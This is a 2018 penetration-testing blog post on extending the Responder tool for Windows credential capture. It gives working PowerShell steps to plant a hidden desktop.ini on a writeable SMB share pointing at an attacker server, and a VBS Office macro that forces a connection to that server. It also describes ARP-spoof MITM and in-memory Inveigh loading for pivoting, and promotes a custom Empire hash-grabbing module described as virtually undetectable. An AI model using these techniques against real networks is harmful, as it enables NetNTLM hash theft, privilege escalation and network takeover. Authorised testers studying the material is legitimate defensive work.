A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Tuesday, 10 July 2018

From Intermediate Responder to Advanced - Expanding the Suite

In our previous article we covered the tool Responder, and how to maximise its effectiveness by using the whole suite of tools and options provided to you. Responder is an incredibly useful network exploit tool and can be extremely powerful when LLMNR/NBNS are on and SMB signing is off. In this article, we will cover how to expand Responder's functionality using other tools in conjunction with it.
If you are not familiar with Responder already, we recommend you learn the basics and read our intermediate guide here: From Beginner Responder to Intermediate – Utilising the Whole Suite.

Expanding the Suite – Application Specific

When targeting specific applications you can increase the effectiveness of Responder significantly. For example; if you find a writeable SMB share on a network that is heavily used by clients and admins you can utilise that against the network with Responder. To do so you must first craft a malicious Desktop.ini file. Instructions are below:

Create the Desktop.ini file:
a.       Open a PowerShell window.
b.      Run mkdir <directory name>.
c.       Run attrib +s <directory name>.
d.      Enter the directory.
e.      Run echo [.ShellClassInfo] > desktop.ini.
f.        Run:
                                                               i.      For Windows Vista victim and above: echo IconResource=\\<Responder server IP>\directory >> desktop.ini.
                                                             ii.      For Windows XP victim: echo IconFile=\\<Responder server IP>\directory >> desktop.ini.
g.       Run attrib +s +h desktop.ini.

Check the contents of the file look like:
 [.ShellClassInfo]
IconResource=\\<Responder server IP>\directory
 

Once this is complete, you can place the desktop.ini file and the folder in which it is contained onto the writeable share. Any Windows clients connecting to the share with Windows Explorer will automatically attempt to resolve the icon of the folder; this will lead to a login attempt to your SMB module in Responder. If Responder is running and you have set the destination IP address correctly in the desktop.ini file you will be able to harvest the NetNTLM hash of anyone browsing to this SMB share. You can pair this technique with MultiRelay (usage discussed in previous article) for maximum effect, if domain admins use this share and SMB signing is off on the domain controller you will find it easy to conquer the entire network. If this is not the case, you will be able to use this to gain significant lateral spread and harvest some hashes for cracking while you are at it. Hash grabbing will work across subnets with this method. Shown below is an example of what the exploited SMB share should look like once you drop your malicious directory with desktop.ini inside.


Another example of an application specific attack would be using Microsoft Office macros. To create a malicious macro which will connect to your Responder server enter this VBS code into the macro:
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//<Responder server IP>/directory", 1)
You can then spread this Microsoft Office file however you see fit, if you can get an admin to open it you may be able to escalate your privileges or at least gain lateral spread and some more hashes for cracking!
These methods will also work across subnets, unlike LLMNR/NBNS hash grabbing in most scenarios. Responder naturally relies upon LLMNR and/or NBNS to direct victims to its fake servers for hash grabbing. These two protocols only operate on a single subnet/domain. By shedding reliance upon these protocols, we allow for hashes to be grabbed across subnets.
There are of course other application specific methods you can utilise; in general if you can force Windows to connect to Responder with NTLMSSP you will be able to get a hash as Windows will automatically hand over credentials. Methods such as the file:// resource locator in HTML are disabled in modern browsers, but there are plenty of other methods. This article: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ contains an impressive list of methods you could utilise against your target network. It also deserves credit for being my original inspiration for the desktop.ini method and has provided the creation steps for the two malicious files above.

Expanding the Suite – ARP Spoofing

Whilst Responder is a powerful tool, it is generally sat around waiting for victims to connect to it. This does decrease the speed of an attack a great deal, especially when targeting a specific machine. Additionally, Responder is unable to intercept correctly created SMB connections; it can only intercept connections that send LLMNR/NBNS broadcasts. If you are in a scenario where two SMB servers are syncing with each other using their Administrator accounts and you are aware of this, Responder would normally be unable to help you MITM this connection. With some extra help from an ARP spoofing attack this is possible!
The article at http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html contains a brief description of how to utilise ARP spoofing with Responder to MITM the aforementioned scenario. Laurent Gaffie's blog is a good source of information on Responder in general, should you require an explanation of the basics.

Expanding the Suite – Your Own Code

The Responder tool is under a GPL v3 license, which means you can do just about anything with the code so long as you ship it with the license and provide credit. For more details read this page: https://github.com/lgandx/Responder/blob/master/LICENSE. Thanks to this generous license we can take, adjust and use the Responder code as we see fit.
For example, I have adjusted the Responder code to work with Empire as a credential extraction module. The module takes the IP address of the Empire server as an argument and uses it to force the victim to connect back to Responder. You might assume that this is essentially redundant thanks to tools like Mimikatz, however; the main advantage of this module is that it does not require any privileged access, appears on the network as legitimate traffic and is virtually undetectable by AntiVirus as it is all standard Windows operation. By tricking Windows into handing over the NetNTLM hash for us we can still gather hashes for lateral spread and cracking when we don't have any privileges on our target machine. Installation is as easy as dropping the data and lib directories into the directory of your Empire installation. You can find the module here: https://www.secquest.co.uk/tools/HashGrabModule.zip
Since you can adapt and use the Responder code for your own purposes, advanced users will find that Responder is incredibly flexible. Responder's LLMNR and NBNS spoofing code could be utilised in a different application for example, or one of the individual servers could be used in something like the custom Empire module presented above.

Expanding the Suite – PowerShell and Pivoting

Whilst Responder is a powerful tool and can be used to pivot into target networks using a technique described here, <https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/> if you already have access to PowerShell on a victim you can use that victim to pivot your LLMNR and NBNS attacks into the target network. Inveigh is a tool much like Responder and is controlled in a very similar manner, however; Inveigh is written in PowerShell instead of Python. This makes Inveigh an excellent choice for pivoting into Windows networks. Using IEX Inveigh can be downloaded directly into RAM on the target machine and executed with a single command.
Inveigh can be found here: https://github.com/Kevin-Robertson/Inveigh
An excellent list of different ways to download Inveigh to a machine can be found here: https://gist.github.com/HarmJ0y/bb48307ffa663256e239
Inveigh operates in a very similar manner to Responder, and should be simple to use if you already know how to use Responder. It is worth bearing in mind that Inveigh has support for both privileged and unprivileged execution modes. If you have gained access to a machine under an unprivileged user, you may be able to use Inveigh to escalate your privileges. In conjunction with the application specific methods listed above, Inveigh pivoting can be a powerful and stealthy method of privilege escalation.

Summary

As you can see, Responder can become an extremely flexible and powerful tool when used to its full potential. Our intermediate guide covered the usage of what was provided, and this article has covered how you can expand upon those tools. By no means are the above the only ways to expand Responder, I highly encourage you to seek out your own methods. If you discover any new and interesting ways of adapting Responder to a specific network I would love to hear about them. Additionally, if you have any questions regarding Responder I would be happy to answer them, you can contact me at: lewis@secquest.co.uk.

No comments:

Post a Comment